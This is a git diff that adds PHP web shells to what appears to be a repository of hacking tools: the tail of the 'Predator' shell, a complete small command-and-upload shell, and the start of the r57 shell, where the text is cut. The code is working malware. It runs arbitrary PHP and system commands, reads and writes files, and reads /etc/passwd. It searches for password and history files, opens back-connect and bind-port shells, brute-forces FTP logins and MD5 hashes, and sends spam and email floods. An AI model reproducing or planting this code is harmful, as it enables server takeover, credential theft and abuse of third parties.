+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('system'))
+	{
+		ob_start();
+		system($in);
+		$out = ob_get_contents();
+		ob_end_clean();
+	}
+elseif(function_exists('shell_exec'))
+	{
+		$out = shell_exec($in);
+	}
+elseif(is_resource($f = popen($in,"r")))
+  {
+   $out = "";
+   while(!@feof($f)) { $out .= fread($f,1024); }
+   pclose($f);
+  }
+return $out;
+}
+
+function shell()
+{
+if($_POST['type']==1)
+	{		
+		eval(stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==2)
+	{
+		pwd();
+		print_r(ex(stripslashes($_POST['value'])));
+	}
+elseif($_POST['type']==3)
+	{
+		if($_SESSION['safe_mode'] == 1){
+		if(($u=safe_ex('ls -la'))!='')
+		{return $u;}else{return safe_ex('dir');};
+		
+		}else{
+		if(($u=ex('ls -la'))!='')
+		{return $u;}else{return ex('dir');};
+		}
+	}
+elseif($_POST['type']==4)
+	{
+		if(file_exists(stripslashes($_POST['value'])))
+			{
+				if($safe_mode!=1){
+				echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
+				}else{
+				echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
+				};
+				$_SESSION['edit']=1;
+				$_SESSION['filename'] = $_POST['value'];
+			}else{
+				return 'File doesn\'t exists!';
+			}
+	}
+elseif($_POST['type']==5)
+	{
+		fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
+	}
+elseif($_POST['type']==6)
+	{
+		$uploaddir = pwd();
+		if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
+		move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); 	
+	}
+elseif($_POST['type']==7)
+	{
+		echo alias($_POST['value']);
+	}
+elseif($_POST['type']==8)
+	{
+		echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
+	}
+elseif($_POST['type']==9)
+	{
+		echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
+	}
+elseif($_POST['type']==10)
+	{
+		echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
+	}
+elseif($_POST['type']==12)
+	{
+		echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==13)
+	{
+		echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
+	}
+elseif($_POST['type']==14)
+	{
+		echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
+	}
+
+else 
+	{$u = ex('ls -la');
+	 if($u == ''){return ex('dir');}else{return $u;};
+	}
+
+return null;
+};
+
+function edit()
+{
+if ($_SESSION['edit'] == 1){
+$_SESSION['edit']=0;
+return "<br><center><input type=submit style=\"border:1px solid #666666;background:#333333;font-weight:bold;\" value=\"Save\"></center>";};
+}
+
+function getsystem()
+{
+	return php_uname('s')." ".php_uname('r')." ".php_uname('v');
+};	
+
+function getserver()
+{
+	return getenv("SERVER_SOFTWARE");
+};
+
+
+function getuser()
+{
+$out = get_current_user();	
+	if($out!="SYSTEM")
+		{
+			if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
+		}
+return $out;
+};
+
+function pwd()
+{
+if($_POST['type']==3)
+	{
+		$_SESSION['pwd'] = stripslashes($_POST['value']);
+	}
+chdir($_SESSION['pwd']);
+$cwd = getcwd();
+if($u=strrpos($cwd,'/'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'/';}
+		else{return $cwd;};
+	}
+elseif($u=strrpos($cwd,'\\'))
+	{
+		if($u!=strlen($cwd)-1){
+		return $cwd.'\\';}
+		else{return $cwd;};
+	};
+}
+
+function safe_ex($in)
+{
+if($in){
+$d=dir('.');
+
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y	 H:i",$mtime)."	";
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+}
+
+function safe_read($in)
+{
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+include("/etc/passwd");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+echo ini_get("safe_mode");
+echo ini_get("open_basedir");
+
+file_get_contents($in);
+}
+
+}
+?>
+
+
+
+
+
+
+
+
+
+
+<html>
+<head>
+<title>.::Predator::.</title>
+<META http-equiv="Content-Type" content="text/html; charset=CP866">
+<style type=text/css>
+.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
+.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
+.td1 {border:2px solid #000000;}
+.td2 {border:1px solid #000000;}
+.ram {border:1px solid #666666;background:#222222;}
+body { scrollbar-base-color: #333333}
+</style>
+<script>
+function kill()
+{
+var y;
+y = confirm('Are you really want to kill shell?');
+if(y == true)
+{
+document.location = '?kill=yes';
+}
+}
+</script>
+</head>
+<body bgcolor='#000000'>
+<center><table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
+<tr><td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
+<table valign=top>
+<tr><td valign=top>
+<table valign=center class='ram'>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>System:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getsystem();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>Server:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getserver();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>User:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php echo getuser();?></b></font>
+</td></tr>
+<tr><td width=5% align=right>
+<font size=2 color=#888888>pwd:</font>
+</td>
+<td width=100%>
+<font size=2 color=red><b><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></b></font>
+</td></tr>
+</table>
+</td>
+<td width=13% valign=center align=center>
+<table width=100% height=100% cellpadding=0 cellspacing=0><tr><td width=100% height=100%>
+<center>
+<a href="http://h0ld-up.info"><table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:#444444">
+<tr><td><font size=2 color=#999999>
+<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
+</font></td></tr></table></a></center>
+</td></tr><tr><td height=5></td></tr><tr><td>
+<center>
+
+<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value='   Kill Shell   ' onclick='kill()'>
+
+</center>
+</td></tr></table>
+
+</td>
+<td class='ram' width=45% valign=center align=center>
+<table  cellpadding=0 cellspacing=0>
+<tr><td>
+<table valign=top cellpadding=0 cellspacing=0>
+<tr><td align=right>
+<font size=2 color='#888888'>PHP-version:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MySQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>MSSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>PostgreSQL:</font>
+</td></tr>
+<tr><td align=right>
+<font size=2 color='#888888'>Oracle:</font>
+</td></tr>
+</table>
+</td><td>
+<table valign=top  cellpadding=0 cellspacing=0>
+<tr><td>
+<b><font size=2 color=red><?php echo phpversion();?></font></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmysql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo testmssql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo postgresql();?></b>
+</td></tr>
+<tr><td>
+<b><?php echo oracle();?></b>
+</td></tr>
+</table>
+</td><td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Safe_mode:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>cURL:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>wget:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>fetch:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>lynx:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><?php echo safe_mode();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testcurl();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testwget();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testfetch();?></b>
+</td></tr>
+<tr><td valign=top>
+<b><?php echo testlynx();?></b>
+</td></tr>
+</table></td>
+<td width=4%></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Perl:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server time:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Server date:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Total space:</font>
+</td></tr>
+<tr><td valign=top align=right>
+<font color=#888888 size=2>Free space:</font>
+</td></tr>
+</table></td>
+<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
+<tr><td valign=top>
+<b><font size=2 color=green><?php echo testperl();?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('H:i');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo date('d-m-Y');?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(disk_total_space(getcwd()));?></font></b>
+</td></tr>
+<tr><td valign=top>
+<b><font size=2 color=#999999><?php echo view_size(diskfreespace(getcwd()));?></font></b>
+</td></tr>
+</table></td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+<tr><td width=100% height=100% bgcolor='#333333' valign=top>
+<table width=100%>
+<tr><td valign=top align=center>
+<table width=100% height=200 class='td1'>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<input type=hidden name="type" value=5>
+<textarea cols=80 rows=13 name="value" class='ta'>
+<?php echo htmlspecialchars(shell());?>
+</textarea><?php echo edit();?></form>
+</td>
+
+
+
+<td valign=top align=left width=10%>
+<table width=100% height=100% class='td2'>
+<form action method=POST><tr><td valign=top align=left height=40% style="border-bottom: 1px solid #000000;">
+<b>.::System shell::.</b><br>
+<input type=hidden name="type" value=2>
+<center><input type=text name="value" size=35 class='ta'></center>
+</ br><center><input type=submit value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
+</td></tr></form>
+<tr><td valign=top align=left>
+<form action method=POST>
+<table>
+<tr><td>
+<b>.::PHP-code::.</b>
+</td><td align=right>
+<input type=submit value="Run code" class='bt'>
+<input type=hidden name="type" value=1>
+</td></tr>
+<tr><td colspan=2>
+<textarea rows=5 cols=26 name="value" class='ta'><?php echo "readfile('/etc/passwd');";?></textarea>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+<table>
+<tr><td height=0></td></tr>
+</table>
+<table width=100% height=80 class='td1' valign=top>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::PWD::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="cd">
+<input type=hidden name="type" value=3>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::File Edit::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Edit">
+<input type=hidden name="type" value=4>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=72 value=<?php echo pwd();?>>
+</td></tr>
+</table></form>
+</td></tr>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Download::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="Download">
+<input type=hidden name="type" value=11>
+</td></tr>
+<tr><td colspan=2>
+<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
+</td></tr>
+</table></form></td><td valign=top align=left width=50%>
+<form enctype="multipart/form-data" action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Upload::.</b>
+</td><td align=right colspan=3>
+<input type=submit class='bt' value="Upload">
+<input type=hidden name="type" value=6>
+</td></tr>
+<tr><td colspan=2>
+<font size=2 color=#888888>New name:</b>
+<input type=text size=15 name="newname" class=ta>
+</td><td width=4></td><td colspan=2>
+<input type=file name="userfile" size=28>
+</td></tr>
+</table></form>
+<tr><td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td>
+<b>.::Alias::.</b>
+</td><td align=right>
+<input type=submit class='bt' value="RUN">
+<input type=hidden name="type" value=7>
+</td></tr>
+<tr><td colspan=2>
+<select name='value' class='ta' width=200>
+<option>find apahce config file</option>
+<option>find access_log files</option>
+<option>find error_log files</option>
+<option>find suid files</option>
+<option>find suid files in current dir</option>
+<option>find sgid files</option>
+<option>find sgid files in current dir</option>
+<option>find config.inc.php files</option>
+<option>find config.inc.php files in current dir</option>
+<option>find config* files</option>
+<option>find config* files in current dir</option>
+<option>find all writable files</option>
+<option>find all writable files in current dir</option>
+<option>find all writable directories</option>
+<option>find all writable directories in current dir</option>
+<option>find all writable directories and files</option>
+<option>find all writable directories and files in current dir</option>
+<option>find all service.pwd files</option>
+<option>find service.pwd files in current dir</option>
+<option>find all .htpasswd files</option>
+<option>find .htpasswd files in current dir</option>
+<option>find all .bash_history files</option>
+<option>find .bash_history files in current dir</option>
+<option>find all .mysql_history files</option>
+<option>find .mysql_history files in current dir</option>
+<option>find all .fetchmailrc files</option>
+<option>find .fetchmailrc files in current dir</option>
+<option>list file attributes on a Linux second extended file system</option>
+<option>show opened ports</option>
+<option>---------------------------------------------------------------------------------------------------------</option>
+</select>
+</td></tr>
+</table></form></td>
+<script>
+function base64Encode(str)
+{
+	var charBase64 = new Array(
+		'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
+		'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
+		'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
+		'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+	var len = str.length;
+
+	do
+	{
+		chr1 = str.charCodeAt(i++);
+		chr2 = str.charCodeAt(i++);
+		chr3 = str.charCodeAt(i++);
+
+
+		enc1 = chr1 >> 2;
+		enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
+		enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
+		enc4 = chr3 & 0x3F;
+
+		out += charBase64[enc1] + charBase64[enc2];
+
+		if (isNaN(chr2))
+  		{
+			out += '==';
+		}
+  		else if (isNaN(chr3))
+  		{
+			out += charBase64[enc3] + '=';
+		}
+		else
+		{
+			out += charBase64[enc3] + charBase64[enc4];
+		}
+	}
+	while (i < len);
+
+	return out;
+}
+
+
+function base64Decode(str)
+{
+	var indexBase64 = new Array(
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
+		52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
+		-1, 0, 1, 2,  3, 4, 5, 6,  7, 8, 9,10, 11,12,13,14,
+		15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
+		-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
+		41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
+		-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
+	);
+
+	var out = "";
+	var chr1, chr2, chr3;
+	var enc1, enc2, enc3, enc4;
+	var i = 0;
+
+
+	str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
+
+	var len = str.length;
+
+	do
+	{
+		enc1 = indexBase64[str.charCodeAt(i++)];
+		enc2 = indexBase64[str.charCodeAt(i++)];
+		enc3 = indexBase64[str.charCodeAt(i++)];
+		enc4 = indexBase64[str.charCodeAt(i++)];
+
+		chr1 = (enc1 << 2) | (enc2 >> 4);
+		chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+		chr3 = ((enc3 & 3) << 6) | enc4;
+
+		out += String.fromCharCode(chr1);
+
+		if (enc3 != -1)
+		{
+			out += String.fromCharCode(chr2);
+		}
+		if (enc4 != -1)
+		{
+			out += String.fromCharCode(chr3);
+		}
+	}
+	while (i < len);
+
+	if (i != len)
+	{
+		new Error(BASE64_BROKEN);
+		return "";
+	}
+
+	return out;
+}
+
+</script>
+<td valign=top align=left width=50%>
+<form action method=POST>
+<table width=100% height=100% valign=top class='td2'>
+<tr><td width=1%>
+<b>.::Base64_encode::.</b>
+</td><td align=right width=6%>
+<input type=button value="encode" class='bt' onclick='t.value=base64Encode(t.value)'>	
+</td>
+<form action method=POST><td width=1%>
+<b>.::Base64_decode::.</b>
+</td><td align=right width=6%>
+<input type=button value="decode" class='bt' onclick='n.value=base64Decode(n.value)'>	
+</td></tr>
+<tr><td colspan=2>
+<input type=text name='t' class='ta' size=34>
+</td><td colspan=2>
+<input type=text name='n' class='ta' size=34>
+</td></tr>
+</table></form>
+</td></tr>
+</td></tr>
+</table>
+</td></tr><tr></tr><tr><td>
+<table cellpadding=0 cellspacing=0><tr><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Back Connect::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>IP:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='ip' size=15 value=<?php echo $_SERVER['REMOTE_ADDR'];?>></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>port:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=10 value='5000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Connect' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td>
+<table class='td1' width=226>
+<tr><td width=100% class='td2'>
+<form action method=POST>
+<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
+<b>.::Bind port::.</b></td></tr>
+<tr><td width=100% height=10 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2><b>Port:</b></font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='port' size=15 value='6000'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>pass:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<input type=text class='ta' name='pass' size=10 value='hshell'></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
+<td width=5%></td>
+<td width=100% align=right>
+<select class='ta' name='method'>
+<option>Perl</option>
+<option>C#</option>
+<option>---------------------</option>
+</select></td></tr>
+<tr><td width=100% height=5 colspan=3></td></tr>
+<tr><td width=100% align=right colspan=3>
+<input type=hidden name='type' value='12'>
+<input type=submit value='Bind' class='bt'></form>
+<tr><td width=100% height=5 colspan=3></td></tr>
+</table>
+</td></tr>
+</table>
+</td><td width=5></td><td width=50% height=141>
+<table class='td1' width=100% height=100% valign=top><tr><td width=100% height=100% class='td2' valign=top>
+<table cellpadding=0 cellspacing=0 width=95%><tr><td colspan=4>
+<b>.::md5 bruter::.</b>
+</td></tr><tr><td height=10></td></tr>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right><b>hash:</b></font></td><td width=5></td><td align=right>
+<input type=text name='hash' class='ta' size=50>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>log_file:</font></td><td width=5></td><td align=right>
+<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+<font size=2 color="#888888" align=right>dictionary_file:</font></td><td width=5></td><td align=right>
+<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
+</td></tr>
+<tr><td height=5></td>
+<tr><td width=20></td><td>
+</td><td width=5></td><td align=right>
+<input type=submit class='bt' value='Start Brute'>
+</td></tr>
+</table>
+</td></tr></table>
+</td></tr></table>
+<tr></tr><tr><td>
+<table class='td1' width=100% height=310 valign=top align=left>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Spammer::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>emails_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='elist' class='ta' size=17 value="emails.txt">
+</td></tr><tr><td height=5></td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mail_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Start">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td colspan=3 height=30 valign=top><b>.::FTP-Brute::.</b></td></tr>
+<tr><td width=31% align=right>
+<font color=#888888 size=2><b>Host:</b></font>
+</td><td align=right>
+<input type=text name='host' class='ta' size=28>
+</td><td width=5%></td></tr><tr><td height=35 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_users file:</font>
+</td><td align=right>
+<input type=text name='users' class='ta' size=17 value="ftp_users.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_passwd file:</font>
+</td><td align=right>
+<input type=text name='passwd' class='ta' size=17 value="ftp_passwds.txt">
+</td><td></td></tr>
+<tr><td height=5 width=100% colspan=2></td></tr>
+<tr><td align=right>
+<font color=#888888 size=2>ftp_log file:</font>
+</td><td align=right>
+<input type=text name='log' class='ta' size=17 value="ftp_log.txt">
+</td><td></td></tr>
+<tr><td colspan=2 height=20></td></tr>
+<tr><td colspan=2 align=right>
+<input type=submit class='bt' value="Start Brute">
+<input type=hidden name="type" value=9>
+</td></tr>
+</td></table></form>
+<form action method=POST>
+<td valign=top align=left class='td2' width=33%>
+<table cellpadding=0 cellspacing=0 width=100%>
+<tr><td valign=top colspan=3 height=30>
+<b>.::Flooder::.</b>
+<tr><td width=25% align=right>
+<font color=#888888 size=2><b>log_file:</b></font>
+</td><td width=65% align=right>
+<input type=text name='log' class='ta' size=17 value="mflood_log.txt">
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Send to:</font>
+</td><td width=65% align=right>
+<input type=text name='to' class='ta' size=27>
+</td></tr><tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>From:</font>
+</td><td width=65% align=right>
+<input type=text name='from' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Subject:</font>
+</td><td width=65% align=right>
+<input type=text name='subject' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Message:</font>
+</td><td width=65% align=right>
+<textarea name='msg' class='ta' cols=20 rows=4></textarea>
+</td></tr>
+<td height=25><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Amount:</font>
+</td><td width=65% align=right>
+<input type=text name='amount' class='ta' size=17>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+<font color=#888888 size=2>Check<sup>*</sup>:</font>
+</td><td width=65% align=right>
+<input type=text name='check' class='ta' size=27>
+</td></tr>
+<td height=5><td></tr>
+<tr><td width=25% align=right>
+</td><td width=65% align=right>
+<input type=submit class='bt' value="Flood">
+<input type=hidden name='type' value=10>
+</td></tr>
+</table></form>
+</td></tr>
+</table>
+</td></tr>
+</table>
+</td></tr>
+</table></center>
+<center><font size=1 color=#444444>.:[Public v1.0]:.</font></center>
+</body>
+</html>
+	
+<!-- Coded by LoFFi & Ls01r //-->
\ No newline at end of file
diff --git a/xakep-shells/PHP/pws.php.php.txt b/xakep-shells/PHP/pws.php.php.txt
new file mode 100644
index 0000000..cf979a1
--- /dev/null
+++ b/xakep-shells/PHP/pws.php.php.txt
@@ -0,0 +1,35 @@
+<html>
+<head>
+<div align="left"><font size="1">Input command :</font></div>
+<form name="cmd" method="POST" enctype="multipart/form-data">
+<input type="text" name="cmd" size="30" class="input"><br>
+<pre>
+<?php
+if ($_POST['cmd']){
+$cmd = $_POST['cmd'];
+passthru($cmd);
+}
+?>
+</pre>
+<hr>
+<div align="left"><font size="1">Uploader file :</font></div>
+
+<?php
+$uploaded = $_FILES['file']['tmp_name'];
+if (file_exists($uploaded)) {
+   $pwddir = $_POST['dir'];
+   $real = $_FILES['file']['name'];
+   $dez = $pwddir."/".$real;
+   copy($uploaded, $dez);
+   echo "FILE UPLOADED TO $dez";
+}
+?>     </pre>
+<form name="form1" method="post" enctype="multipart/form-data">
+ <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
+ <input type="submit" name="submit2" value="Upload">
+ <input type="file" name="file" size="15">
+	  </td>
+    </tr>
+</table>
+</body>
+</html>
diff --git a/xakep-shells/PHP/r57 Shell.php.php.txt b/xakep-shells/PHP/r57 Shell.php.php.txt
new file mode 100644
index 0000000..51ca60e
--- /dev/null
+++ b/xakep-shells/PHP/r57 Shell.php.php.txt	
@@ -0,0 +1,1925 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
